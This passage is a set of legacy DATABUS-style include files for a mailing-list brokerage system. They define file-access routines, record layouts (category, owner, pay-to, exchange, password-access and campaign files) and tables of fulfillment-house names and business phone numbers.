NCATCODEDEL
BRANCH NCATCODEFLAG TO NCATCODE5
CALL NCATCODEOPEN
NCATCODE5
CALL NCATCODETST
RETURN IF OVER
TRAP IOMssg Giving Error if IO
FILEPI 1;NCATCODEFLIST
DELETE NCATCODEFLIST
TRAPCLR IO
RETURN
.
....................................................................................................
. ENTRY POINT : NCATCODEAIM
. REQUIRED : NCATCODEFLD1,2,3,4,5,6,7,8
. RETURNED : CATCODE RECORD
. DESCRIPTION : AIM CATCODE FILE READ
.
NCATCODEAIM
BRANCH NCATCODEFLAG TO NCATCODE6
CALL NCATCODEOPEN
NCATCODE6
TRAP IOMssg Giving Error if IO
. FILEPI 1;NCATCODEFLE2
READ NCATCODEFLE2,NCATCODEFLD1,NCATCODEFLD2,NCATCODEFLD3,NCATCODEFLD4,NCATCODEFLD5,NCATCODEFLD6,NCATCODEFLD7,NCATCODEFLD8;NCATCODEVARS
TRAPCLR IO
RETURN
.
........................................................................................................
. ENTRY POINT : NCATCODEKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : CATCODE RECORD
. DESCRIPTION : AIM KEY GENERIC CATCODE FILE READ (next match after prior AIM read)
.
NCATCODEKG
BRANCH NCATCODEFLAG TO NCATCODE7
CALL NCATCODEOPEN
NCATCODE7
TRAP IOMssg Giving Error if IO
. FILEPI 1;NCATCODEFLE2
READKG NCATCODEFLE2;NCATCODEVARS
TRAPCLR IO
RETURN
.......................................................................................
.
. ENTRY POINT : NCATCODEOPEN
. REQUIRED : 'NCATCODEFLAG'
. RETURNED : 'NCATCODEFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN CATEGORY CODES FILES
. DISPLAY ERROR AND ABORT IF NOT ONLINE
.
NCATCODEOPEN
TRAP NCATCODEGONE giving Error if IO
OPEN NCATCODEFLIST .,EXCLUSIVE
TRAPCLR IO
MOVE C1, NCATCODEFLAG
RETURN
.
. NOTE(review): NCATCODEGONE has no RETURN; FILEGONE presumably displays the
. error and aborts - confirm it never returns to the caller.
NCATCODEGONE
MOVE NCATCODENAME, FILENAME
CALL FILEGONE
.
............................................................................................
<file_sep>/include/MDC090DD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M090
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC090DD - CAtegory
. NOTE(review): MDC090DD is listed twice above/below (Category and Owner);
. the record layout here is list-owner data, so the Category line is
. probably a stale copy from another DD include - verify.
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
M090NAME Init "MDC_090.isi|NINS1:502"
M090Flist FileLIst
M090FILE IFILE Name="MDC_090.isi|NINS1:502"
M090FILE2 AFILE Name="MDC_090.aam|NINS1:502"
FileListEnd
M090SFILE FILE
.M090SFILE FILE Name="MDC_090.csv"
M090Fld Dim 5
M090Fld2 Dim 28
M090FLAG FORM 1
M090PATH FORM 1
.
M090VARS LIST .for ease I am using Min's names
GKEY Dim 5 1-5 LO Code#
GNAM Dim 25 6-30 Name
GAD1 Dim 25 31-55 Address 1
GAD2 Dim 25 56-80 Address 2
GCTY Dim 20 81-100 City
GSTT Dim 2 101-102 State
GZIP Dim 10 103-112 Zip
GCTR Dim 25 113-137 Country
GCNT Dim 25 138-162 Contact
GPH1 Dim 11 163-173 Phone
GPH2 Dim 11 174-184 Phone
GPHF Dim 11 185-195 FAX
GPHM Dim 11 196-206 Modem
GDLT Dim 1 207-207 'A'ctive/'I'nactive
ListEnd
<file_sep>/include/fulfill.inc
; Last change: JD 16 Nov 2001 7:26 am
. Fulfillment-house tables: names (fulN), phone numbers (fulTELN), order
. counters (fuloctN), and contacts (FulcntN); indexed in parallel by fulnum.
..04/23/02 DB add new fulfil28 Enertex Mktg
..04/03/02 DB updated PIDI fax #.
..11/19/01 DB updated PC DIR fax #.
..11/16/01 JD updated PIDI fax #.
..11/09/01 JD updated ful13/ful20 as well as their contact names.
..09/05/01 DB Changed Kable\Pub Aid Name, #,contact name
..07/30/01 DB Changed fulfill juliane/msgi to msgi/metro dir
..07/17/01 DB added new fulfil27 juliane/msgi dir
..03/13/01 DB Changed fulfil25 ATC From Anna h to Anna m
..01/05/00 ADDED NEW FULFIL 25 ATC
ful1 init "FIDE"
ful2 init "JETSON"
ful3 init "ANACAPA"
ful4 init "ANTARES"
ful5 init "SMALL PUB" SMALL PUBLISHERS
ful6 init "DTM" .note prob with 3 byte name pad to 4.
fuL7 init "PIDI"
ful8 init "EPSILON"
ful9 init "LIST MAINTENANC"
FUL10 INIT "KABLE"
.FUL10 INIT "KABLE/PUB. AID"
FUL11 INIT "THE FIDE GROUP"
FUL12 INIT "NATL SUBSC.FUL."
.FUL13 INIT "METRO SVC/LAURE"
FUL13 INIT "METRO SVC"
FUL14 INIT "NATL CONVSN SYS"
FUL15 INIT "DYNAMARK"
FUL16 INIT "IMI/INFO.MGT."
FUL17 INIT "PACIF.COAST DIR"
FUL18 INIT "INTERACTIVE SYS"
FUL19 INIT "DRCT ACCESS MKTG"
FUl20 init "METRO DIRECT"
FUl21 init "L & E MERIDIAN"
FUl22 init "<NAME>."
FUl23 init "FFA/CATHERINE"
FUl24 init "BLAEMIRE COMM."
FUl25 init "<NAME>./ATC"
FUl26 init "TDMC" .Currently used only by Program 1
FUL27 INIT "MSGI/METRO DIR"
FUL28 INIT "Enertex Mktg"
.
ovrTEL1 init "7737742975"
ovrTEL2 init "2033536661"
ovrTEL3 init "6124816363"
.
fulTEL1 init "8056858561"
fulTEL2 init "5169791960"
fulTEL3 init "8055660305"
fulTEL4 init "6312345472"
fulTEL5 init "3154379863" SMALL PUBLISHERS
fulTEL6 init "6305955361"
.fuLTEL7 init "7036835458"
fuLTEL7 init "7036839537"
fulTEL8 init "6172731359" EPSILON
fulTEL9 init "2035526799" LIST MAINTENANCE"
FULTEL10 INIT "8157345202" KABLE
.FULTEL10 INIT "8157341129" KABLE/PUB.AID"
fulTEL11 init "8056858561" THE FIDE GROUP
fulTEL12 init "7146939704" natl subscription fulfillment.
FULTEL13 INIT "9173397164" METRO SVC/LAUREN .per CO 21Oct99 DLH
FULTEL14 INIT "7038470381" NATIONAL CONVERSION SYSTEMS 12/12/95 DLH
FULTEL15 INIT "2127857503" DYNAMARK 11/21/96 JD
FULTEL16 INIT "4084280715" IMI INFO MGMT
FULTEL17 INIT "5624329716" PACIF.COAST DIR
.FULTEL17 INIT "5624338935" PACIF.COAST DIR
FULTEL18 INIT "7032475445" INTERACTIVE SRVCS 12/02/98
FULTEL19 INIT "5163640644" Drct Access 08/12/99
FULTEL20 INIT "9173397163" Metro Drct 12/22/99 per SA
FULTEL21 INIT "7039137050" L & E Meridian 06/05/00 per SMM
FUltel22 init "5165644197" ARG/Richie
FUltel23 init "3015852595" FFA
FUltel24 init "7036205339" BLAEMIRE
FUltel25 init "3045352667" ATC
FUltel26 init "4153827088" TDMC .Currently used only by Program 1
FULTEL27 INIT "9173397164" MSGI/METRO DIRECT
FULTEL28 INIT "5106288313" ENERTEX MKTG
.
ovroct1 form 2 number of orders
ovroct2 form 2 number of orders
ovroct3 form 2 number of orders
.
fuloct1 form 2 number of orders
fuloct2 form 2 number of orders
fuloct3 form 2 number of orders
fuloct4 form 2 number of orders
fuloct5 form 2 number of orders
fuloct6 form 2 number of orders
fuloct7 form 2 number of orders
fuloct8 form 2 number of orders
fuloct9 form 2 number of orders
fuloct10 form 2 number of orders
fuloct11 form 2 number of orders
fuloct12 form 2 number of orders
fuloct13 form 2 number of orders
fuloct14 form 2
fuloct15 form 2
fuloct16 form 2
fuloct17 form 2
fuloct18 form 2
fuloct19 form 2
fuloct20 form 2
fuloct21 form 2
fuloct22 form 2
fuloct23 form 2
fuloct24 form 2
fuloct25 form 2
fuloct26 form 2
fuloct27 FORM 2
fuloct28 FORM 2
.
ovrnum form 2 table index
fulnum form 2 table index
fulnum1 form 2 table index
.
. NOTE(review): "<NAME>" strings below look like data-scrubbing artifacts
. from an export, not real values - confirm against the live file.
Fulcnt1 init " " contact at Fide.
Fulcnt2 init " " contact at Jetson.
Fulcnt3 init " " contact at Anacapa.
Fulcnt4 init "<NAME>" contact at Antares.
Fulcnt5 init " " contact at Small pub.
Fulcnt6 init "Mark" contact at DTM.
Fulcnt7 init " " contact at PIDI.
Fulcnt8 init " " contact at Epsilon.
Fulcnt9 init " " contact at List Maintenance.
Fulcnt10 init "Jan" contact at KABLE Progressive
.Fulcnt10 init "Marci" contact at KABLE/Pub Aid. Progressive
Fulcnt10a init "Jan" contact at KABLE/Pub Aid. E Mag
Fulcnt11 init " " contact at FIDE.
Fulcnt12 init " " contact at NATL SUBSC.FUL.
.Fulcnt13 init "<NAME>" contact at METRO SVC/LAURE.
Fulcnt13 init "<NAME>" contact at METRO SVC/Citizen Soldier.
Fulcnt14 init " " contact at NATL CONVSN SYS.
Fulcnt15 init " " contact at Dynamark.
Fulcnt16 init " " contact at IMI/INFO.MGT.
Fulcnt17 init " " contact at PACIF.COAST DIR.
Fulcnt18 init " " contact at INTERACTIVE SYS.
Fulcnt19 init "Charmaine" contact at DRCT ACCESS MKTG.
Fulcnt20 init "<NAME>" contact at METRO DIRECT/Am Friends Srv
Fulcnt21 init "<NAME>" contact at L & E MERIDIAN
Fulcnt22 init "Richie/Rod" contact at ARG/RICHIE G.
Fulcnt23 init "Catherine" contact at FFA/CATHERINE
Fulcnt24 init " " contact at BLAEMIRE COMM.
Fulcnt25 init "<NAME>." contact at ANNA M.\ATC.
Fulcnt26 init " " contact at TDMC
Fulcnt27 INIT " " contact at MSGI/METRO DIRECT Earthwatch
Fulcnt28 INIT " " contact at ENERTEX Mktg
..........................................................................................
<file_sep>/include/Nxrfdd.inc
******************************************************************************
*VARIABLE INCLUSION FOR EXCHANGE LIST/MAILER REF FILE.
******************************************************************************
* FILE: LISTMLR
* RECORD SIZE: 12
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 LIST NUMBER 1-6
* KEY: 2 MAILER NUMBER 7-12 - DUPLICATES ALLOWED
******************************************************************************
. Patch 1.1 ASH 15Mar2005 Mailer field conversion
.
NXRFFLst Filelist
.START PATCH 1.1 REPLACED LOGIC
.NXRFFILE IFILE KEYLEN=6,FIX=10,Name="LISTMLR"
.NXRFFIL2 IFILE KEYLEN=4,FIX=10,DUP,Name="LISTMLR1"
NXRFFILE IFILE KEYLEN=6,FIX=12,Name="LISTMLR.ISI|NINS1:502"
NXRFFIL2 IFILE KEYLEN=6,FIX=12,DUP,Name="LISTMLR1.ISI|NINS1:502"
.END PATCH 1.1 REPLACED LOGIC
Filelistend
.
NXRFFLAG FORM 1
NXRFFLG2 FORM 1
NXRFPATH FORM 1
NXRFNAME DIM 8
NXRFNAM1 INIT "LISTMLR "
NXRFNAM2 INIT "LISTMLR1 "
.
NXRFFLD DIM 6 key field for NXRFFILE (list number)
NXRFFLD2 DIM 6 key field for NXRFFIL2 (mailer number)
.
NXRFLIST DIM 6 1-6 LIST NUMBER KEY
NXRFMLR DIM 6 7-12 MAILER NUMBER
..............................................................................
<file_sep>/include/NSLSIO.INC
..............................................................................
.
. NSLSIO INCLUSION
.
. FILE NAME : NINSLS
. REC LENGTH: 163 SPACE
. INDEX KEY : 4
.
. Entry points lazily open the file via NSLSOPEN; NSLSPATH selects which
. file member (1=NSLSFILE sequential, 2=NSLSFLE2 keyed) gets opened.
. NOTE(review): NSLSWRT checks NSLSFLAG with BRANCH while the read entry
. points COMPARE NSLSPATH TO NSLSFLAG - confirm the asymmetry is intended.
..............................................................................
.
. ENTRY POINT : NSLSSEQ
. REQUIRED :
. RETURNED : SALES RECORD
. DESCRIPTION : SEQUENTIAL SALES FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NSLSSEQ COMPARE NSLSPATH TO NSLSFLAG
GOTO NSLS4 IF EQUAL
CALL NSLSOPEN
NSLS4 FILEPI 1;NSLSFILE
READ NSLSFILE,SEQ;SLSvars 1-4 MAILER NUMBER.
RETURN
..............................................................................
.
. ENTRY POINT : NSLSWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : SEQ TXT WRITE
.
NSLSWRT BRANCH NSLSFLAG TO NSLS5
CALL NSLSOPEN
NSLS5 FILEPI 1;NSLSFILE
WRITE NSLSFILE,SEQ;SLsvars
RETURN
.
. ENTRY POINT : NSLSKEY - exact keyed read via NSLSFLE2 using nslsfld
NSLSKEY COMPARE NSLSPATH TO NSLSFLAG
GOTO NSLS1 IF EQUAL
CALL NSLSOPEN
NSLS1 FILEPI 1;NSLSFLE2
READ NSLSFLE2,nslsfld;SLSvars
RETURN
..............................................................................
. ENTRY POINT : NSLSKS - keyed-sequential read (next record) via NSLSFLE2
NSLSKS COMPARE NSLSPATH TO NSLSFLAG
GOTO NSLS3 IF EQUAL
CALL NSLSOPEN
NSLS3 FILEPI 1;NSLSFLE2
READKS NSLSFLE2;SLSvars
RETURN
..............................................................................
.
. ENTRY POINT : NSLSOPEN
. REQUIRED : 'NSLSFLAG'
. RETURNED : 'NSLSFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MAILER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NSLSOPEN TRAP NSLSGONE IF IO
BRANCH NSLSPATH OF NSLSOPN1,NSLSOPN2
NSLSOPN1 OPEN NSLSFILE,NSLSNAME
TRAPCLR IO
MOVE C1 TO NSLSFLAG
RETURN
NSLSOPN2 OPEN NSLSFLE2,NSLSNAME
TRAPCLR IO
MOVE C2 TO NSLSFLAG
RETURN
.
. NOTE(review): NSLSGONE has no RETURN; FILEGONE presumably aborts - confirm.
NSLSGONE MOVE NSLSNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/MDC060DD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M060
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC060DD - CAtegory
. NOTE(review): MDC060DD is listed twice above/below; the record here holds
. category code + description, so the Owner line likely belongs to
. MDC090DD - verify against the other DD includes.
.MDC091DD - Owner ???? data no supplied
.MDC060DD - Owner
.MDCTXTDD - Text
......................................................
M060NAME Init "MDC_060.isi|NINS1:502"
M060FILE IFILE Name="MDC_060.isi|NINS1:502"
M060SFILE FILE
.M060SFILE FILE Name="MDC_060.csv"
M060Fld Dim 3
M060FLAG FORM 1
M060PATH FORM 1
.
M060VARS LIST .for ease I am using Min's names
FC Dim 3 1-3 cat Code#
FDSC Dim 25 4-28 Desc
ListEnd
<file_sep>/include/nspe2dd.inc
..............................................................................
.
. NSPE2DD INCLUSION
. LR special-notes file: internal and mailer note text keyed by LR number.
.
. FILE NAME : NINSPEC2
. REC LENGTH: 1006
. INDEX KEY : 1-6
..............................................................................
.
NSPE2FILE IFILE KEYLEN=6,VAR=1006,COMP,NODUPLICATES
.NSPE2NAME INIT "NINSPEC2"
.NSPE2NAME INIT "NINSPEC2.ISI|20.20.30.103:502"
NSPE2NAME INIT "NINSPEC2.ISI|NINS1:502"
NSPE2FLD DIM 6
NSPE2FLAG FORM 1
nspe2lock form 1 0 or 1 - filepi, 2 =record locking, 3 = no locks
..............................................................................
NSPE2VARS list
NSPE2LR dim 6 1-6 LR NUMBER
DESC003 DIM 500 7-506 INTERNAL NOTES
DESC004 DIM 500 507-1006 MAILER NOTES
listend
.
<file_sep>/include/NPASDD.INC
...............................................................................
.NPASDD - DATA DESCRIPTOR
. Password/access file: one record per program-code + password.
.
.FILE: NINPASS
.
.SIZE: 68 VARIABLE,COMPRESSED
.
.INDEX: 1-6 ()
...............................................................................
NPASNAME INIT "NINPASS.dat|NINS1:502 "
NPASFLIST FILELIST
NPASFILE IFILE KEYLEN=6,Fixed=68,Name="NINPASS.isi|NINS1:502"
NPASFLE1 IFILE KEYLEN=1,Name="NINPASS1.isi|NINS1:502"
NPASFLE2 AFILE Fixed=68,Name="NINPASS.aam|NINS1:502"
FILELISTEND
.
NPASFLD DIM 6 KEY
NPASFLD1 DIM 1 KEY // for isi read // added 2/28/06 DMS
NPASFLD2 DIM 8 KEY // for aam read (5+3) // added 2/28/06 DMS
NPASFLAG FORM 1
NPASLOCK FORM 1 0 OR 1=File Locks, 2=Record Locks, 3=No Locks
.Vars used with Passwrd.plf .Added 03/19/99 by ASH
PROGCODE DIM 1
PASSFLAG DIM 1
.End of added vars
.
NPASLIST LIST
NPASKEY DIM 6 1-6 PASSWORD - KEY: "PROGCODE" + ACTUAL PASSWORD
NPASUSER DIM 10 7-16 USER ID
NPASFILL DIM 1 17-17 NOT USED.
NPASNAM1 DIM 22 18-39 FULL USER NAME.
NPASDESC DIM 21 40-60 DESCRIPTION OF PROGRAM ACCESS
NPASDATE DIM 8 61-68 DATE ENTERED/MODIFIED 'CCYYMMDD'
LISTEND
.
<file_sep>/include/nmoddd.inc
******************************************************
* NMODDD INCLUSION
* PRICE MODIFIER FILE FOR DATACARD SUBSIDIARY FILES
* PRICE MODIFIER FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER PRICE MODIFIER FILE.
* ****************************************************
.
. FILE: NINMOD
. LENGTH: 43
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-3 NMODNUM
.AIMDEX KEY: 4-23 NMODDESC
......................................................
NMODNAME INIT "NINMOD"
NMODFLIST FILELIST
.NMODFILE IFILE KEYLEN=9,FIXED=43,Name="NINMOD.isi"
.NMODFLE2 AFILE FIXED=43,Name="NINMOD.aam"
. dlh ??????????? NMODFILE IFILE KEYLEN=9,FIXED=43,Name="NINMOD.isi|NINS1:502"
NMODFILE IFILE KEYLEN=3,FIXED=43,Name="NINMOD.isi|NINS1:502"
NMODFLE2 AFILE FIXED=43,Name="NINMOD.aam|NINS1:502"
FILELISTEND
.
NMODLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NMODFLD DIM 3 isi key field (modifier number)
NMODFLD1 DIM 23 aam key field (description)
NMODFLAG FORM 1
NMODPATH FORM 1
.
NMODVARS LIST
NMODNUM DIM 3 1-3 PRICE MODIFIER NUMBER
NMODDESC DIM 20 4-23 PRICE MODIFIER DESCRIPTION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
NMODCALC DIM 20 24-43 PRICE MODIFIER CALCULATION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /1000
. "002"
. "003" *1
. "004"
. "005"
. "006" *0
. "007"
. "008"
. "009"
LISTEND
<file_sep>/include/npaydd.inc
..............................................................................
.
. NPAYDD INCLUSION
. NIN PAY-TO FILE DEFINITION
.
. FILE NAME : NINPAY
. REC LENGTH: 227 FIXED
. INDEX KEY : 2-6 (POWNER,PAYNUM)
. AIM KEY : 7-96
. added tele & fax 16may95.????
.
. ASH 31AUG98 CREATED TWO NEW FIELDS: P2STREET,PCOUN
. Record length changed to 227 fixed
. Patch: Increased length of PNAME and PCOMP to 45 each
. Record length changed to 187 FIXED
. Patch Author: <NAME>
. Patch Date: July 9,1998
.
. Patch #100 - Created as test for Year 2000 conversion
. Record length changed to 147 FIXED
. This takes into consideration two new fields
. added on 16may95 (see above), as well as
. new date format
. Patch Author: <NAME>
. Patch Date: May 21,1998
..............................................................................
.
.NPAYFILE IFILE KEYLEN=5,FIXED=125
.NPAYFILE IFILE KEYLEN=5,FIXED=147
.NPAYFILE IFILE KEYLEN=5,FIXED=187
.NPAYFIL AFILE 50,1,,FIXED=125
.NPAYFIL2 AFILE FIXED=125
.NPAYFIL2 AFILE FIXED=147
.NPAYFIL2 AFILE FIXED=187
.NPAYFLE3 FILE FIXED=125
.NPAYFLE3 FILE FIXED=147
.NPAYFLE3 FILE FIXED=187
PayFList Filelist
NPAYFILE IFILE KEYLEN=5,FIXED=227,Name="NINPAY.isi|NINS1:502"
NPAYFIL2 AFILE FIXED=227,Name="NINPAY.AAM|NINS1:502"
FileListEnd
NPAYFLE3 FILE FIXED=227
NPAYNAME INIT "NINPAY "
NPAYFLD DIM 5
.NPAYFLD2 DIM 53
NPAYFLD2 DIM 93
NPAYPATH FORM 1
NPAYFLAG FORM 1
NPAYFLG2 FORM 1
NPAYFLG3 FORM 1
NPAYLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=no locks
.
.Defined PAYNUM codes:
. 0= automatically applied substitute for list owner info.
. 1= Consumer Direct
. 2= List Processing Service
. 3= Epsilon
. 4= CMS
. 5= not assigned
. 6= not assigned
. 7= Lifestyle Selector
. 8= misc fulfilment Corp's.
. 9= Generally used to override a default 0 entry. and
. force it to revert to owner file info.
...............................................................................
payvars list
PAYRCODE DIM 1 1-1 RECORD CODE = '6'
POWNER DIM 4 2-5 OWNER NUMBER
PAYNUM DIM 1 6-6 PAY-TO NUMBER FOR MULT PAY-TO'S
PNAME DIM 45 7-51 CONTACT NAME
PCOMP DIM 45 52-96 COMPANY NAME
PSTREET DIM 25 97-121 STREET ADDRESS
P2STREET DIM 25 122-146 STREET ADDRESS2
PCITY DIM 15 147-161 CITY
PSTATE DIM 2 162-163 STATE
PZIP DIM 10 164-173 ZIPCODE
PCOUN DIM 15 174-188 COUNTRY CODE
PPASS DIM 10 189-198 PASSWORD ID
PDATE DIM 8 199-206 REVISED DATE
PBLANK DIM 1 207-207 NOT USED.
payTELE DIM 10 208-217 TELEPHONE NUMBER
payFAX DIM 10 218-227 FAX NUMBER. (was mislabeled 128-227; 10 bytes after payTELE)
listend
.PNAME DIM 25 7-51 CONTACT NAME
.PCOMP DIM 25 52-96 COMPANY NAME
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.CHECKWRITER DATABUS
.FIXINV DATABUS
.MODINV DATABUS
.NINP29 DATABUS
.NINP29EDIT DATABUS
.ERPAYLET DATABUS
.PAYMOD DATABUS
LISTON
<file_sep>/include/nxchdd.inc
* NXCHDD/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER EXCHANGE ACCOUNT DETAIL FILE.
* *****************************************************************************
.
. FILE: NINXCHNG, NINLRXNG
. LENGTH: 200
.COMPRESS: NONE
. TYPE: ISAM/AAM
. KEY: EXKEY,LR
.
. DLH 08 Feb 2010 nxchlock
. ASH 05APR2005 Complete rewrite - File Conversion
...............................................................................
NXCHNAME INIT "NINXCHNG|NINS1:502 "
.
NXCHFLIST FILELIST
NXCHFILE IFILE KEYLEN=17,FIXED=200,Name="NINXCHNG.isi|NINS1:502"
NXCHFLE2 IFILE KEYLEN=6,FIXED=200,Name="NINLRXNG.isi|NINS1:502"
NXCHFLE3 AFILE FIXED=200,Name="NINXCHNG.aam|NINS1:502"
.
FILELISTEND
.
NXCHFLD1 DIM 17 key for NXCHFILE (mlr1+mlr2+entry)
NXCHFLD2 DIM 6 key for NXCHFLE2 (LR number)
NXCHFLD3 DIM 9 .AamDex Mlr 1
NXCHFLD4 DIM 9 .AamDex Mlr 2
NXCHPATH FORM 1 .1=mlr,mlr,entry;2=lr
NXCHFLAG FORM 1
NXCHLock FORM 1 0/1 filepi, 2 record locks, 3 no locks
.
nxchvars list
EXKEY DIM 17 1-17 MLR1,MLR2,ENTRY
LR2 DIM 3 18-20
LR DIM 6 21-26 LR #
USAGE1 FORM 10 27-36 MAILER1 USAGE
USAGE2 FORM 10 37-46 MAILER2 USAGE
QTYfill FORM 3 47-49 ORDER QTY expansion
QTY FORM 9 50-58 ORDER QTY
LIST DIM 6 59-64 LIST #
DAT DIM 8 65-72 Order DATE CCYYMMDD
STAT DIM 1 73-73 exchange STATUS
. 'C' =CANCELLED ADJUSTED, 'R'=RENTAL,
. 'X'=CANCELLED NOT ADJUSTED.
MLRSW DIM 1 74-74 1 IF MLR1, 2 IF MLR2
TYPE DIM 2 75-76 TYPIST INITALS
XCHCOMNT DIM 100 77-176 KEYED IN COMMENTS
.begin patch 11 Feb 09
Date1 Dim 8 177-184 .order date or date of manual entry
DateM Dim 8 185-192 .Mail date of manual entry
.xchfiller dim 24 177-200
xchfiller dim 8 193-200
.end patch 11 Feb 09
listend<file_sep>/include/NWFDD.INC
..............................................................................
.
. NWFDD INCLUSION
. NWF Stats FILE DEFINITION
.
. FILE NAME : NWFSTATs
. REC LENGTH: 478 FIXED
. INDEX KEY :
..............................................................................
.
NWFFILE IFILE KEYLEN=50,FIXED=478,UNCOMP
NWFFLE2 IFILE KEYLEN=6,FIXED=478,UNCOMP
NWFNAME INIT "NWFSTATS"
NWFNME2 INIT "NWFSTAT1"
NWFFLD dim 50
nwffld2 dim 6
NWFFLAG FORM 1
NWFFLAg2 FORM 1
nwfpath form 1
.
NWFvars list
nwfcampn dim 30 1-30 Campaign
nwfmdate dim 8 31-38 mm,dd,cc,yy maildate
nwfudate dim 8 39-46 Last update of stats
nwfwkso form 6 47-52 weeks out
nwfpdate dim 8 53-60 mail processed thru
nwfpanel dim 60 61-120
nwfsrce dim 6 121-126
nwflist dim 30 127-156
nwfsel dim 30 157-186
ninlist dim 6 187-192
nwftype dim 1 193-193 list type Continuation or Test
nwfmqty form 8 194-201
nwfresp form 7 202-208
nwfrr form 1.6 209-216
nwf96z form 1.2 217-220 .nwf only?
nwfP form 1.6 221-228 .nwf only?
nwfsqrtP form 1.6 229-236 .nwf only?
nwfpci form 1.6 237-244
nwfnci form 1.6 245-252
nwfrev form 9 253-261 gross revenue
nwfavgft form 2.2 262-266
nwflstcpm form 4.2 267-273 list cost per m
nwftlst$ form 5.2 274-281
nwfpckcpm form 3.2 282-287
nwfTpck form 5.2 288-295 total package cost
NWFTCPM FORM 3.2 296-301 total cost per M
Nwftmcst form 6.2 302-310 total mail cost
nwfupcst form 4.2 311-317 unit premium cost
nwftpcst form 5.2 318-325 total premium cost
nwftotcst form 6.2 326-334 total cost
nwfnetrev form 6.2 335-343
nwfnrpci form 6.2 344-352
nwfnrnci form 6.2 353-361
nwfCstA form 4.2 362-368 cost to aquire
nwfpcaci form 4.2 369-375
nwfncaci form 4.2 376-382
nwfCTA form 4.2 383-389
nwfcost$ form 3.2 390-395
nwfnqty form 7 396-402
nwfinv form 5.2 403-410
nwflcpm form 3.2 411-416
nwfkeycd dim 6 417-422
nwfasresp form 7 423-429 Associate responses
nwfasrev form 9 430-438 " revenue
nwfasrr form 1.6 439-446 " response rate
nwfbasresp form 7 447-453 Basic responses
nwfbasrev form 9 454-462 " revenue
nwfbasrr form 1.6 463-470 " response rate
nwfCI form 1.6 471-478
listend
.END OF INCLUDE
.
..............................................................................
<file_sep>/include/NSCHDD.INC
..............................................................................
.
. NSCHDD INCLUSION
. NIN BOOKING SCHEDULE FILE DEFINITION
.
. FILE NAME : MAILDATE
. REC LENGTH: 26 FIXED
. AIM KEY : 1-6 (6 POSITION LIST#)
. : 7-8 YEAR
. : 9-10 MONTH
..............................................................................
IFNZ PC
NSCHFILE AFILE FIX=26
XIF
IFZ PC
.NSCHFILE AFILE 19,3,,,FIX=26
NSCHFILE AFILE FIX=26
XIF
.
NSCHFLAG FORM 1
NSCHNAME INIT "MAILDATE"
NSCHFLD DIM 9 LIST
NSCHFLD2 DIM 5 YEAR
NSCHFLD3 DIM 5 MONTH
.
. NSCHFILE FILE RECORD SIZE 26 FIXED
. .............
.
SCHKEY DIM 6 1-6 LIST NUMBER
SCHYEAR DIM 2 7-8 YEAR SCHEDULED (ASSUMED TO BE CURRENT YEAR IF
. NOT SPECIFIED).
SCHMONTH DIM 2 9-10 MONTH SCHEDULED
SCHDAY DIM 2 11-12 DAY SCHEDULED (ALWAYS A MONDAY).
SCHMLR DIM 7 13-19 MAILER DESC KEYED IN
SCHQUANT DIM 7 20-26 QUANTITY SCHEDULED KEYED IN.
.
<file_sep>/include/ncmpdd104.inc
...................................................
.
. NCMPDD INCLUSION
. NIN supplimental (Campaign) ORDER FILE DEFINITION
. one record per campaign
. FILE NAME : NINCMP.DAT
. REC LENGTH: 535 FIXED
. INDEX KEY : (1) 001-006 (Campaign Number)
.
. AAM KEYS : (1) 007-051 (Campaign Name)
. (2) 052-057 (Mailer Number)
. (3) 058-066 (Broker Number/Cnt)
. (4) 067-078 (P.O. Number)
. (5) 079-079 (Campaign Status)
.
. Patch 1.2 DMB 06/18/2005 Changed IP of File Manager
. Patch 1.1 ASH 11/23/2004 Increased Mailer/Broker and converted to Company Number
. Increased Ship-to to prep for future conversion
.
NCMPNAME DIM 8
NCMPNME1 INIT "NINCMP"
.START PATCH 1.1 REPLACED LOGIC
.NCMPFILE IFILE KEYLEN=6,FIXED=535
.NCMPFLE2 AFILE FIXED=535
.NCMPNME2 INIT "NINCMP"
.>Patch 1.2 Begin
NCMPFLIST FileList
.NCMPFILE IFILE KEYLEN=6,FIXED=535,uncomp,Name="NINCMP.ISI"
.NCMPFLE2 AFILE FIXED=535,uncomp,Name="NINCMP.AAM"
.NCMPFILE IFILE KEYLEN=6,FIXED=535,uncomp,Name="NINCMP.ISI|20.20.30.104:502"
NCMPFILE IFILE KEYLEN=6,FIXED=535,uncomp,Name="NINCMP.ISI|10.10.30.104:502"
